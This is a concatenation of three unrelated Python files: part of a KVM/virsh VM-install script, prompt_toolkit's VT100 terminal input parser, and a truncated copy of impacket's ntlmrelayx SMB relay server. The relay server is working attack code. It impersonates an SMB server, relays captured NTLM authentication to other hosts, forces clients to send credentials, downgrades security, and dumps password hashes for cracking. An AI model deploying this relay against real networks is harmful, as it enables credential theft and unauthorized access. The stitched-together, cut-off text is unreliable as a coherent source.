generated_mac.join(':' + new_hex) return self.config['mac'] + generated_mac def generate_ip(self, **kwargs ): """Generate a unique IP address within the virsh DHCP scope.""" # We don't want to generate an IP outside the DHCP range in the virsh # network. ip_start, ip_end = self.funcs.get_ip_range(self.config) start = re.sub('^\d{1,3}\.\d{1,3}\.\d{1,3}\.', '', ip_start) end = re.sub('^\d{1,3}\.\d{1,3}\.\d{1,3}\.', '', ip_end) # For now we only generate the last octect in an IPv4 address. # TODO: add support for generating other octets first_three_octets = re.sub('\.\d{1,3}$', '', ip_start) if 'octet' in kwargs: return first_three_octets + '.' + kwargs['octet'] else: return first_three_octets + '.' + str(random.randint(int(start), int(end))) def setup_network(self): """Setup the virsh network settings for the VM.""" # Dump the network config to an xml file for 1) easy parsing and # 2) backup just in case something goes sideways. self.funcs.net_dumpxml(self.config) # TODO: Add IPv6 support # First, find a new mac address try: mac_addresses = self.funcs.get_mac_addresses(self.config) new_mac = '' good_mac = False while good_mac is False: new_mac = self.generate_mac(self.config['mac']) if new_mac not in mac_addresses: good_mac = True self.config['new_mac'] = new_mac if self.config['verbose'] is True: print ' new mac found: ' + new_mac except Exception, e: raise Exception('setup_network failed ' + 'to generate a new mac address: ' + str(e)) # Then find an IP address in range that doesn't already exist new_ip = '' ip_addresses = self.funcs.get_ip_addresses(self.config) if 'ipaddress' in self.config: if self.config['ipaddress'] not in ip_addresses: range_floor, range_ceiling = self.funcs.get_ip_range(self.config) new_ip = self.generate_ip(octet=self.config['ipaddress']) else: raise Exception('setup_network failed, ip address not ' + 'available' + self.config['ipaddress']) else: try: good_ip = False while good_ip is False: new_ip = self.generate_ip() if new_ip not in ip_addresses: good_ip = True if self.config['verbose'] is True: print ' new ip found: ' + new_ip except Exception, e: raise Exception('setup_network failed ' + 'to generate a new ip address: ' + str(e)) # Record the new IP for other functions' use self.config['new_ip'] = new_ip # Now generate the virst net-update command. command = ['virsh', 'net-update', self.config['network'], 'add-last', 'ip-dhcp-host'] host_xml = '"<host mac=\'' + new_mac + '\' name=\'' + \ self.config['name'] + '.' + self.config['domain'] + \ '\' ip=\'' + new_ip + '\'/>"' command.append(host_xml) # We need to run virsh net-edit twice, once for the running config # (current), then again for the persistent config (config). # To be sure we're not talking to the same List object, we'll # initialize two new ones with the contents of command[]. current_command = list(command) config_command = list(command) # Now, update the current config try: current_command.append('--current') self.funcs.run_command(current_command, self.config) except Exception, e: raise Exception('virsh net-update --current failed: ' + str(e)) # First, update the persistent config try: config_command.append('--config') self.funcs.run_command(config_command, self.config) except Exception, e: raise Exception('virsh net-update --config failed: ' + str(e)) # Now do the same for DNS # Lists are funny, so we're going to create a new one. Don't want # any elements left over from our old command[] command = list() command = ['virsh', 'net-update', self.config['network'], 'add-last', 'dns-host'] host_xml = '"<host ip=\'' + new_ip + '\'><hostname>' + \ self.config['name'] + '.' + self.config['domain'] + \ '</hostname></host>"' command.append(host_xml) config_command = list(command) current_command = list(command) # Now, update the current config try: current_command.append('--current') self.funcs.run_command(current_command, self.config) except Exception, e: raise Exception('virsh net-update --current failed: ' + str(e)) # First, update the persistent config try: config_command.append('--config') self.funcs.run_command(config_command, self.config) except Exception, e: raise Exception('virsh net-update --config failed: ' + str(e)) def do_virtinstall(self): """Run the virt-install command, basically the last step.""" network_string = 'network:' + self.config['network'] + ',' + \ 'model=virtio,mac=' + self.config['new_mac'] command = ['virt-install', '--noautoconsole', '--hvm', '--vnc', '--name', self.config['name'], '--vcpus', str(self.config['vcpus']), '--ram', str(self.config['ram']), '--network', network_string, '--os-type', self.config['type'], '--os-variant', self.config['variant'], '--boot', 'hd'] if 'clone' in self.config: devpath = os.path.split(self.config['clone'])[0] install_command = command + ['--disk', 'path=' + devpath + '/' + self.config['name']] else: imgpath = os.path.split(self.config['image'])[0] install_command = command + ['--disk', 'path=' + imgpath + '/' + self.config['name'] + '.img' + ',size=' + str(self.config['disk']) + ',format=qcow2'] try: self.funcs.run_command(install_command, self.config) except Exception, e: raise e def __init__(self, parsed_args): # TODO: put in environemnt checks, i.e., does virt-install exist, etc. # TODO: verify that we're running as root. # Save relative path to module. # This is necessary because we don't know where the site-packages # directory will live, so we have to determine that at runtime. package_directory = os.path.dirname(os.path.abspath(__file__)) # Load include_vars and funcs. varsyaml = os.path.join(package_directory, 'include_vars.yaml') include_vars_yaml = open(varsyaml).read() self.vars = yaml.load(include_vars_yaml) self.funcs = include_funcs.KVMInstallFuncs() # Check to see if we're on a supported platform. if platform.dist()[0] not in self.vars['supported_platforms']: raise Exception('unsupported platform: ' + platform.dist()[0]) # This make my IDE happy self.config = {} # Parse the config file and build our config object if parsed_args.verbose is True: print ' parsing config file' if parsed_args.configfile is None: parsed_args.configfile = self.vars['default_config'] self.config = self.funcs.parse_config(parsed_args) # Set up our random string and temp directory domain = string.ascii_letters + string.digits random8 = self.funcs.get_random(domain, 8) stdout, stderr, virsh_netdumpxml = self.funcs.setup_tmp(random8) self.config['stdout'] = stdout self.config['stderr'] = stderr self.config['virsh_netdumpxml'] = virsh_netdumpxml # If we have both a clone and image config directive, prefer LVM if 'clone' in self.config: if self.config['verbose'] is True: print ' setting up lvm' self.setup_lvm() else: if self.config['verbose'] is True: print ' setting up image' if 'image' in self.config: self.setup_image() else: raise Exception('you must specify either an LVM ' + 'or file base image with -c or -i') # Now set up the new network try: if self.config['verbose'] is True: print ' setting up network' self.setup_network() except Exception, e: raise Exception('setup network failed: ' + str(e)) # Update /etc/hosts try: if self.config['verbose'] is True: print ' updating /etc/hosts' self.funcs.update_etchosts(self.config, 'add') except Exception, e: raise Exception('update /etc/hosts failed: ' + str(e)) # Restart the dnsmasq service try: if self.config['verbose'] is True: print ' restarting dnsmasq' self.funcs.restart_dnsmasq(self.config) except Exception, e: raise Exception('restart dnsmasq failed: ' + str(e)) # Finally, we can install the VM try: if self.config['verbose'] is True: print ' doing virt-install' self.do_virtinstall() except Exception, e: raise Exception('virt-install failed: ' + str(e))
""" Parser for VT100 input stream. """ from __future__ import unicode_literals import os import re import six import termios import tty from ..keys import Keys from ..key_binding.input_processor import KeyPress __all__ = ( 'InputStream', 'raw_mode', 'cooked_mode', ) _DEBUG_RENDERER_INPUT = False _DEBUG_RENDERER_INPUT_FILENAME = 'prompt-toolkit-render-input.log' # Regex matching any CPR response # (Note that we use '\Z' instead of '$', because '$' could include a trailing # newline.) _cpr_response_re = re.compile('^' + re.escape('\x1b[') + r'\d+;\d+R\Z') # Mouse events: # Typical: "Esc[MaB*" Urxvt: "Esc[96;14;13M" and for Xterm SGR: "Esc[<64;85;12M" _mouse_event_re = re.compile('^' + re.escape('\x1b[') + r'(<?[\d;]+[mM]|M...)\Z') # Regex matching any valid prefix of a CPR response. # (Note that it doesn't contain the last character, the 'R'. The prefix has to # be shorter.) _cpr_response_prefix_re = re.compile('^' + re.escape('\x1b[') + r'[\d;]*\Z') _mouse_event_prefix_re = re.compile('^' + re.escape('\x1b[') + r'(<?[\d;]*|M.{0,2})\Z') class _Flush(object): """ Helper object to indicate flush operation to the parser. """ pass # Mapping of vt100 escape codes to Keys. ANSI_SEQUENCES = { '\x1b': Keys.Escape, '\x00': Keys.ControlSpace, # Control-Space (Also for Ctrl-@) '\x01': Keys.ControlA, # Control-A (home) '\x02': Keys.ControlB, # Control-B (emacs cursor left) '\x03': Keys.ControlC, # Control-C (interrupt) '\x04': Keys.ControlD, # Control-D (exit) '\x05': Keys.ControlE, # Contrel-E (end) '\x06': Keys.ControlF, # Control-F (cursor forward) '\x07': Keys.ControlG, # Control-G '\x08': Keys.ControlH, # Control-H (8) (Identical to '\b') '\x09': Keys.ControlI, # Control-I (9) (Identical to '\t') '\x0a': Keys.ControlJ, # Control-J (10) (Identical to '\n') '\x0b': Keys.ControlK, # Control-K (delete until end of line; vertical tab) '\x0c': Keys.ControlL, # Control-L (clear; form feed) '\x0d': Keys.ControlM, # Control-M (13) (Identical to '\r') '\x0e': Keys.ControlN, # Control-N (14) (history forward) '\x0f': Keys.ControlO, # Control-O (15) '\x10': Keys.ControlP, # Control-P (16) (history back) '\x11': Keys.ControlQ, # Control-Q '\x12': Keys.ControlR, # Control-R (18) (reverse search) '\x13': Keys.ControlS, # Control-S (19) (forward search) '\x14': Keys.ControlT, # Control-T '\x15': Keys.ControlU, # Control-U '\x16': Keys.ControlV, # Control-V '\x17': Keys.ControlW, # Control-W '\x18': Keys.ControlX, # Control-X '\x19': Keys.ControlY, # Control-Y (25) '\x1a': Keys.ControlZ, # Control-Z '\x1c': Keys.ControlBackslash, # Both Control-\ and Ctrl-| '\x1d': Keys.ControlSquareClose, # Control-] '\x1e': Keys.ControlCircumflex, # Control-^ '\x1f': Keys.ControlUnderscore, # Control-underscore (Also for Ctrl-hypen.) '\x7f': Keys.Backspace, # (127) Backspace '\x1b[A': Keys.Up, '\x1b[B': Keys.Down, '\x1b[C': Keys.Right, '\x1b[D': Keys.Left, '\x1b[H': Keys.Home, '\x1bOH': Keys.Home, '\x1b[F': Keys.End, '\x1bOF': Keys.End, '\x1b[3~': Keys.Delete, '\x1b[3;2~': Keys.ShiftDelete, # xterm, gnome-terminal. '\x1b[1~': Keys.Home, # tmux '\x1b[4~': Keys.End, # tmux '\x1b[5~': Keys.PageUp, '\x1b[6~': Keys.PageDown, '\x1b[7~': Keys.Home, # xrvt '\x1b[8~': Keys.End, # xrvt '\x1b[Z': Keys.BackTab, # shift + tab '\x1b[2~': Keys.Insert, '\x1bOP': Keys.F1, '\x1bOQ': Keys.F2, '\x1bOR': Keys.F3, '\x1bOS': Keys.F4, '\x1b[11~': Keys.F1, # rxvt-unicode '\x1b[12~': Keys.F2, # rxvt-unicode '\x1b[13~': Keys.F3, # rxvt-unicode '\x1b[14~': Keys.F4, # rxvt-unicode '\x1b[15~': Keys.F5, '\x1b[17~': Keys.F6, '\x1b[18~': Keys.F7, '\x1b[19~': Keys.F8, '\x1b[20~': Keys.F9, '\x1b[21~': Keys.F10, '\x1b[23~': Keys.F11, '\x1b[24~': Keys.F12, '\x1b[25~': Keys.F13, '\x1b[26~': Keys.F14, '\x1b[28~': Keys.F15, '\x1b[29~': Keys.F16, '\x1b[31~': Keys.F17, '\x1b[32~': Keys.F18, '\x1b[33~': Keys.F19, '\x1b[34~': Keys.F20, '\x1b[1;5A': Keys.ControlUp, # Cursor Mode '\x1b[1;5B': Keys.ControlDown, # Cursor Mode '\x1b[1;5C': Keys.ControlRight, # Cursor Mode '\x1b[1;5D': Keys.ControlLeft, # Cursor Mode '\x1bOA': Keys.ControlUp, # Application Mode (tmux) '\x1bOB': Keys.ControlDown, # Application Mode (tmux) '\x1bOC': Keys.ControlRight, # Application Mode (tmux) '\x1bOD': Keys.ControlLeft, # Application Mode (tmux) '\x1b[5A': Keys.ControlUp, '\x1b[5B': Keys.ControlDown, '\x1b[5C': Keys.ControlRight, '\x1b[5D': Keys.ControlLeft, # Meta + arrow keys. Several terminals handle this differently. # The following sequences are for xterm and gnome-terminal. # (Iterm sends ESC followed by the normal arrow_up/down/left/right # sequences, and the OSX Terminal sends ESCb and ESCf for "alt # arrow_left" and "alt arrow_right." We don't handle these # explicitely, in here, because would could not distinguesh between # pressing ESC (to go to Vi navigation mode), followed by just the # 'b' or 'f' key. These combinations are handled in # the input processor.) '\x1b[1;3D': (Keys.Escape, Keys.Left), '\x1b[1;3C': (Keys.Escape, Keys.Right), '\x1b[1;3A': (Keys.Escape, Keys.Up), '\x1b[1;3B': (Keys.Escape, Keys.Down), } class _IsPrefixOfLongerMatchCache(dict): """ Dictiory that maps input sequences to a boolean indicating whether there is any key that start with this characters. """ def __missing__(self, prefix): # (hard coded) If this could be a prefix of a CPR response, return # True. if (_cpr_response_prefix_re.match(prefix) or _mouse_event_prefix_re.match(prefix)): result = True else: # If this could be a prefix of anything else, also return True. result = any(v for k, v in ANSI_SEQUENCES.items() if k.startswith(prefix) and k != prefix) self[prefix] = result return result _IS_PREFIX_OF_LONGER_MATCH_CACHE = _IsPrefixOfLongerMatchCache() class InputStream(object): """ Parser for VT100 input stream. Feed the data through the `feed` method and the correct callbacks of the `input_processor` will be called. :: def callback(key): pass i = InputStream(callback) i.feed('data\x01...') :attr input_processor: :class:`~prompt_toolkit.key_binding.InputProcessor` instance. """ # Lookup table of ANSI escape sequences for a VT100 terminal # Hint: in order to know what sequences your terminal writes to stdin, run # "od -c" and start typing. def __init__(self, feed_key_callback): assert callable(feed_key_callback) self.feed_key_callback = feed_key_callback self.reset() if _DEBUG_RENDERER_INPUT: self.LOG = open(_DEBUG_RENDERER_INPUT_FILENAME, 'ab') def reset(self, request=False): self._start_parser() def _start_parser(self): """ Start the parser coroutine. """ self._input_parser = self._input_parser_generator() self._input_parser.send(None) def _get_match(self, prefix): """ Return the key that maps to this prefix. """ # (hard coded) If we match a CPR response, return Keys.CPRResponse. # (This one doesn't fit in the ANSI_SEQUENCES, because it contains # integer variables.) if _cpr_response_re.match(prefix): return Keys.CPRResponse elif _mouse_event_re.match(prefix): return Keys.Vt100MouseEvent # Otherwise, use the mappings. try: return ANSI_SEQUENCES[prefix] except KeyError: return None def _input_parser_generator(self): """ Coroutine (state machine) for the input parser. """ prefix = '' retry = False flush = False while True: flush = False if retry: retry = False else: # Get next character. c = yield if c == _Flush: flush = True else: prefix += c # If we have some data, check for matches. if prefix: is_prefix_of_longer_match = _IS_PREFIX_OF_LONGER_MATCH_CACHE[prefix] match = self._get_match(prefix) # Exact matches found, call handlers.. if (flush or not is_prefix_of_longer_match) and match: self._call_handler(match, prefix) prefix = '' # No exact match found. elif (flush or not is_prefix_of_longer_match) and not match: found = False retry = True # Loop over the input, try the longest match first and # shift. for i in range(len(prefix), 0, -1): match= self._get_match(prefix[:i]) if match: self._call_handler(match, prefix[:i]) prefix = prefix[i:] found = True if not found: self._call_handler(prefix[0], prefix[0]) prefix = prefix[1:] def _call_handler(self, key, insert_text): """ Callback to handler. """ if isinstance(key, tuple): for k in key: self._call_handler(k, insert_text) else: self.feed_key_callback(KeyPress(key, insert_text)) def feed(self, data): """ Feed the input stream. """ assert isinstance(data, six.text_type) if _DEBUG_RENDERER_INPUT: self.LOG.write(repr(data).encode('utf-8') + b'\n') self.LOG.flush() for c in data: # Replace \r by \n. (Some clients send \r instead of \n when enter # is pressed. E.g. telnet and some other terminals.) # It's also too complicated to handle \r and \n separetely in the # key bindings. if c == '\r': c = '\n' self._input_parser.send(c) def flush(self): """ Flush the buffer of the input stream. This will allow us to handle the escape key (or maybe meta) sooner. The input received by the escape key is actually the same as the first characters of e.g. Arrow-Up, so without knowing what follows the escape sequence, we don't know whether escape has been pressed, or whether it's something else. This flush function should be called after a timeout, and processes everything that's still in the buffer as-is, so without assuming any characters will folow. """ self._input_parser.send(_Flush) def feed_and_flush(self, data): """ Wrapper around ``feed`` and ``flush``. """ self.feed(data) self.flush() class raw_mode(object): """ :: with raw_mode(stdin): ''' the pseudo-terminal stdin is now used in raw mode ''' """ def __init__(self, fileno): self.fileno = fileno self.attrs_before = termios.tcgetattr(fileno) def __enter__(self): # NOTE: On os X systems, using pty.setraw() fails. Therefor we are using this: newattr = termios.tcgetattr(self.fileno) newattr[tty.LFLAG] = self._patch(newattr[tty.LFLAG]) termios.tcsetattr(self.fileno, termios.TCSANOW, newattr) # Put the terminal in cursor mode. (Instead of application mode.) os.write(self.fileno, b'\x1b[?1l') def _patch(self, attrs): return attrs & ~(termios.ECHO | termios.ICANON | termios.IEXTEN | termios.ISIG) def __exit__(self, *a, **kw): termios.tcsetattr(self.fileno, termios.TCSANOW, self.attrs_before) # # Put the terminal in application mode. # self._stdout.write('\x1b[?1h') class cooked_mode(raw_mode): """ (The opposide of ``raw_mode``:: with cooked_mode(stdin): ''' the pseudo-terminal stdin is now used in cooked mode. ''' """ def _patch(self, attrs): return attrs | (termios.ECHO | termios.ICANON | termios.IEXTEN | termios.ISIG)
#!/usr/bin/env python # Copyright (c) 2013-2016 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # SMB Relay Server # # Authors: # Alberto Solino (@agsolino) # Dirk-jan Mollema / Fox-IT (https://www.fox-it.com) # # Description: # This is the SMB server which relays the connections # to other protocols from threading import Thread import ConfigParser import struct import logging from impacket import smb, ntlm from impacket.nt_errors import STATUS_MORE_PROCESSING_REQUIRED, STATUS_ACCESS_DENIED, STATUS_SUCCESS from impacket.spnego import SPNEGO_NegTokenResp, SPNEGO_NegTokenInit, TypesMech from impacket.examples.ntlmrelayx.clients import SMBRelayClient, MSSQLRelayClient, LDAPRelayClient, HTTPRelayClient, IMAPRelayClient from impacket.smbserver import SMBSERVER, outputToJohnFormat, writeJohnOutputToFile from impacket.spnego import ASN1_AID from impacket.examples.ntlmrelayx.utils.targetsutils import ProxyIpTranslator class SMBRelayServer(Thread): def __init__(self,config): Thread.__init__(self) self.daemon = True self.server = 0 #Config object self.config = config #Current target IP self.target = None #Targets handler self.targetprocessor = self.config.target #Username we auth as gets stored here later self.authUser = None self.proxyTranslator = None # Here we write a mini config for the server smbConfig = ConfigParser.ConfigParser() smbConfig.add_section('global') smbConfig.set('global','server_name','server_name') smbConfig.set('global','server_os','UNIX') smbConfig.set('global','server_domain','WORKGROUP') smbConfig.set('global','log_file','smb.log') smbConfig.set('global','credentials_file','') if self.config.outputFile is not None: smbConfig.set('global','jtr_dump_path',self.config.outputFile) # IPC always needed smbConfig.add_section('IPC$') smbConfig.set('IPC$','comment','') smbConfig.set('IPC$','read only','yes') smbConfig.set('IPC$','share type','3') smbConfig.set('IPC$','path','') self.server = SMBSERVER(('0.0.0.0',445), config_parser = smbConfig) self.server.processConfigFile() self.origSmbComNegotiate = self.server.hookSmbCommand(smb.SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate) self.origSmbSessionSetupAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX, self.SmbSessionSetupAndX) # Let's use the SMBServer Connection dictionary to keep track of our client connections as well #TODO: See if this is the best way to accomplish this self.server.addConnection('SMBRelay', '0.0.0.0', 445) def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket): connData = smbServer.getConnectionData(connId, checkStatus = False) if self.config.mode.upper() == 'REFLECTION': self.target = ('SMB',connData['ClientIP'],445) # if self.config.mode.upper() == 'TRANSPARENT' and self.proxytranslator is not None: # translated = self.proxytranslator.translate(connData['ClientIP'],connData['ClientPort']) # logging.info('Translated to: %s' % translated) # if translated is None: # self.target = connData['ClientIP'] # else: # self.target = translated if self.config.mode.upper() == 'RELAY': #Get target from the processor #TODO: Check if a cache is better because there is no way to know which target was selected for this victim # except for relying on the targetprocessor selecting the same target unless a relay was already done self.target = self.targetprocessor.get_target(connData['ClientIP']) ############################################################# # SMBRelay #Get the data for all connections smbData = smbServer.getConnectionData('SMBRelay', False) if smbData.has_key(self.target): # Remove the previous connection and use the last one smbClient = smbData[self.target]['SMBClient'] del smbClient del smbData[self.target] logging.info("SMBD: Received connection from %s, attacking target %s" % (connData['ClientIP'] ,self.target[1])) try: if recvPacket['Flags2'] & smb.SMB.FLAGS2_EXTENDED_SECURITY == 0: extSec = False else: if self.config.mode.upper() == 'REFLECTION': # Force standard security when doing reflection logging.info("Downgrading to standard security") extSec = False recvPacket['Flags2'] += (~smb.SMB.FLAGS2_EXTENDED_SECURITY) else: extSec = True #Init the correct client for our target client = self.init_client(extSec) except Exception, e: logging.error("Connection against target %s FAILED" % self.target[1]) logging.error(str(e)) else: encryptionKey = client.get_encryption_key() smbData[self.target] = {} smbData[self.target]['SMBClient'] = client if encryptionKey is not None: connData['EncryptionKey'] = encryptionKey smbServer.setConnectionData('SMBRelay', smbData) smbServer.setConnectionData(connId, connData) return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket) ############################################################# def SmbSessionSetupAndX(self, connId, smbServer, SMBCommand, recvPacket): connData = smbServer.getConnectionData(connId, checkStatus = False) ############################################################# # SMBRelay smbData = smbServer.getConnectionData('SMBRelay', False) ############################################################# respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX) if connData['_dialects_parameters']['Capabilities'] & smb.SMB.CAP_EXTENDED_SECURITY: # Extended security. Here we deal with all SPNEGO stuff respParameters = smb.SMBSessionSetupAndX_Extended_Response_Parameters() respData = smb.SMBSessionSetupAndX_Extended_Response_Data() sessionSetupParameters = smb.SMBSessionSetupAndX_Extended_Parameters(SMBCommand['Parameters']) sessionSetupData = smb.SMBSessionSetupAndX_Extended_Data() sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength'] sessionSetupData.fromString(SMBCommand['Data']) connData['Capabilities'] = sessionSetupParameters['Capabilities'] if struct.unpack('B',sessionSetupData['SecurityBlob'][0])[0] != ASN1_AID: # If there no GSSAPI ID, it must be an AUTH packet blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob']) token = blob['ResponseToken'] else: # NEGOTIATE packet blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob']) token = blob['MechToken'] # Here we only handle NTLMSSP, depending on what stage of the # authentication we are, we act on it messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0] if messageType == 0x01: # NEGOTIATE_MESSAGE negotiateMessage = ntlm.NTLMAuthNegotiate() negotiateMessage.fromString(token) # Let's store it in the connection data connData['NEGOTIATE_MESSAGE'] = negotiateMessage ############################################################# # SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client. # Let's send it to the target server and send the answer back to the client. client = smbData[self.target]['SMBClient'] challengeMessage = self.do_ntlm_negotiate(client,token) ############################################################# respToken = SPNEGO_NegTokenResp() # accept-incomplete. We want more data respToken['NegResult'] = '\x01' respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider'] respToken['ResponseToken'] = str(challengeMessage) # Setting the packet to STATUS_MORE_PROCESSING errorCode = STATUS_MORE_PROCESSING_REQUIRED # Let's set up an UID for this connection and store it # in the connection's data # Picking a fixed value # TODO: Manage more UIDs for the same session connData['Uid'] = 10 # Let's store it in the connection data connData['CHALLENGE_MESSAGE'] = challengeMessage elif messageType == 0x03: # AUTHENTICATE_MESSAGE, here we deal with authentication ############################################################# # SMBRelay: Ok, so now the have the Auth token, let's send it # back to the target system and hope for the best. client = smbData[self.target]['SMBClient'] authenticateMessage = ntlm.NTLMAuthChallengeResponse() authenticateMessage.fromString(token) if authenticateMessage['user_name'] != '': #For some attacks it is important to know the authenticated username, so we store it connData['AUTHUSER'] = authenticateMessage['user_name'] self.authUser = connData['AUTHUSER'] clientResponse, errorCode = self.do_ntlm_auth(client,sessionSetupData['SecurityBlob'],connData['CHALLENGE_MESSAGE']['challenge']) #clientResponse, errorCode = smbClient.sendAuth(sessionSetupData['SecurityBlob'],connData['CHALLENGE_MESSAGE']['challenge']) else: # Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials errorCode = STATUS_ACCESS_DENIED if errorCode != STATUS_SUCCESS: # Let's return what the target returned, hope the client connects back again packet = smb.NewSMBPacket() packet['Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS packet['Flags2'] = smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_EXTENDED_SECURITY packet['Command'] = recvPacket['Command'] packet['Pid'] = recvPacket['Pid'] packet['Tid'] = recvPacket['Tid'] packet['Mid'] = recvPacket['Mid'] packet['Uid'] = recvPacket['Uid'] packet['Data'] = '\x00\x00\x00' packet['ErrorCode'] = errorCode >> 16 packet['ErrorClass'] = errorCode & 0xff # Reset the UID if self.target[0] == 'SMB': client.setUid(0) logging.error("Authenticating against %s as %s\%s FAILED" % (self.target,authenticateMessage['domain_name'], authenticateMessage['user_name'])) #Log this target as processed for this client self.targetprocessor.log_target(connData['ClientIP'],self.target) #del (smbData[self.target]) return None, [packet], errorCode else: # We have a session, create a thread and do whatever we want logging.info("Authenticating against %s as %s\%s SUCCEED" % (self.target,authenticateMessage['domain_name'], authenticateMessage['user_name'])) #Log this target as processed for this client self.targetprocessor.log_target(connData['ClientIP'],self.target) ntlm_hash_data = outputToJohnFormat( connData['CHALLENGE_MESSAGE']['challenge'], authenticateMessage['user_name'], authenticateMessage['domain_name'], authenticateMessage['lanman'], authenticateMessage['ntlm'] ) logging.info(ntlm_hash_data['hash_string']) if self.server.getJTRdumpPath() != '': writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.getJTRdumpPath()) del (smbData[self.target]) self.do_attack(client) # Now continue with the server ############################################################# respToken = SPNEGO_NegTokenResp() # accept-completed respToken['NegResult'] = '\x00' # Status SUCCESS errorCode = STATUS_SUCCESS # Let's store it in the connection data connData['AUTHENTICATE_MESSAGE'] = authenticateMessage else: raise Exception("Unknown NTLMSSP MessageType %d" % messageType) respParameters['SecurityBlobLength'] = len(respToken) respData['SecurityBlobLength'] = respParameters['SecurityBlobLength'] respData['SecurityBlob'] = respToken.getData() else: # Process Standard Security #TODO: Fix this for other protocols than SMB [!] respParameters = smb.SMBSessionSetupAndXResponse_Parameters() respData = smb.SMBSessionSetupAndXResponse_Data() sessionSetupParameters = smb.SMBSessionSetupAndX_Parameters(SMBCommand['Parameters']) sessionSetupData = smb.SMBSessionSetupAndX_Data() sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength'] sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength'] sessionSetupData.fromString(SMBCommand['Data']) connData['Capabilities'] = sessionSetupParameters['Capabilities'] ############################################################# # SMBRelay smbClient = smbData[self.target]['SMBClient'] if sessionSetupData['Account'] != '': #TODO: Fix this for other protocols than SMB [!] clientResponse, errorCode = smbClient.login_standard(sessionSetupData['Account'], sessionSetupData['PrimaryDomain'], sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd']) else: # Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials errorCode = STATUS_ACCESS_DENIED if errorCode != STATUS_SUCCESS: # Let's return what the target returned, hope the client connects back again packet = smb.NewSMBPacket() packet['Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS packet['Flags2'] = smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_EXTENDED_SECURITY packet['Command'] = recvPacket['Command'] packet['Pid'] = recvPacket['Pid'] packet['Tid'] = recvPacket['Tid'] packet['Mid'] = recvPacket['Mid'] packet['Uid'] = recvPacket['Uid'] packet['Data'] = '\x00\x00\x00' packet['ErrorCode'] = errorCode >> 16 packet['ErrorClass'] = errorCode & 0xff # Reset the UID smbClient.setUid(0) #Log this target as processed for this client self.targetprocessor.log_target(connData['ClientIP'],self.target) return None, [packet], errorCode # Now continue with the server else: # We have a session, create a thread and do whatever we want ntlm_hash_data = outputToJohnFormat( '', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'], sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'] ) logging.info(ntlm_hash_data['hash_string']) if self.server.getJTRdumpPath() != '': writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.getJTRdumpPath()) #TODO: Fix this for other protocols than SMB [!] clientThread = self.config.attacks['SMB'](self.config,smbClient,self.config.exeFile,self.config.command) clientThread.start() #Log this target as processed for this client self.targetprocessor.log_target(connData['ClientIP'],self.target) # Remove the target server from our connection list, the work is done del (smbData[self.target]) # Now continue with the server ############################################################# # Do the verification here, for just now we grant access # TODO: Manage more UIDs for the same session errorCode = STATUS_SUCCESS connData['Uid'] = 10 respParameters['Action'] = 0 respData['NativeOS'] = smbServer.getServerOS() respData['NativeLanMan'] = smbServer.getServerOS() respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData # From now on, the client can ask for other commands connData['Authenticated'] = True ############################################################# # SMBRelay smbServer.setConnectionData('SMBRelay', smbData) ############################################################# smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode #Initialize the correct client for the relay target def init_client(self,extSec): if self.target[0] == 'SMB': client = SMBRelayClient(self.target[1], extended_security = extSec) client.setDomainAccount(self.config.machineAccount, self.config.machineHashes, self.config.domainIp) client.set_timeout(60) if self.target[0] == 'MSSQL': client = MSSQLRelayClient(self.target[1],self.target[2]) if self.target[0] == 'LDAP' or self.target[0] == 'LDAPS': client = LDAPRelayClient("%s://%s:%d" % (self.target[0].lower(),self.target[1],self.target[2])) if self.target[0] == 'HTTP' or self.target[0] == 'HTTPS': client = HTTPRelayClient("%s://%s:%d/%s" % (self.target[0].lower(),self.target[1],self.target[2],self.target[3])) if self.target[0] == 'IMAP' or self.target[0] == 'IMAPS': client = IMAPRelayClient("%s://%s:%d" % (self.target[0].lower(),self.target[1],self.target[2])) return client #Do the NTLM negotiate def do_ntlm_negotiate(self,client,token): #Since the clients all support the same operations there is no target protocol specific code needed for now if 'LDAP' in self.target[0]: #Remove the message signing flag #For LDAP this is required otherwise it triggers LDAP signing negotiateMessage = ntlm.NTLMAuthNegotiate() negotiateMessage.fromString(token) #negotiateMessage['flags'] ^= ntlm.NTLMSSP_NEGOTIATE_SIGN clientChallengeMessage = client.sendNegotiate(negotiateMessage.getData()) else: clientChallengeMessage = client.sendNegotiate(token) challengeMessage = ntlm.NTLMAuthChallenge() challengeMessage.fromString(clientChallengeMessage) return challengeMessage #Do NTLM auth def do_ntlm_auth(self,client,SPNEGO_token,authenticateMessage): #The NTLM blob is packed in a SPNEGO packet, extract it for methods other than SMB respToken2 = SPNEGO_NegTokenResp(SPNEGO_token) token = respToken2['ResponseToken'] clientResponse = None if self.target[0] == 'SMB': clientResponse, errorCode = client.sendAuth(SPNEGO_token,authenticateMessage) if self.target[0] == 'MSSQL': #This client needs a proper response code try: 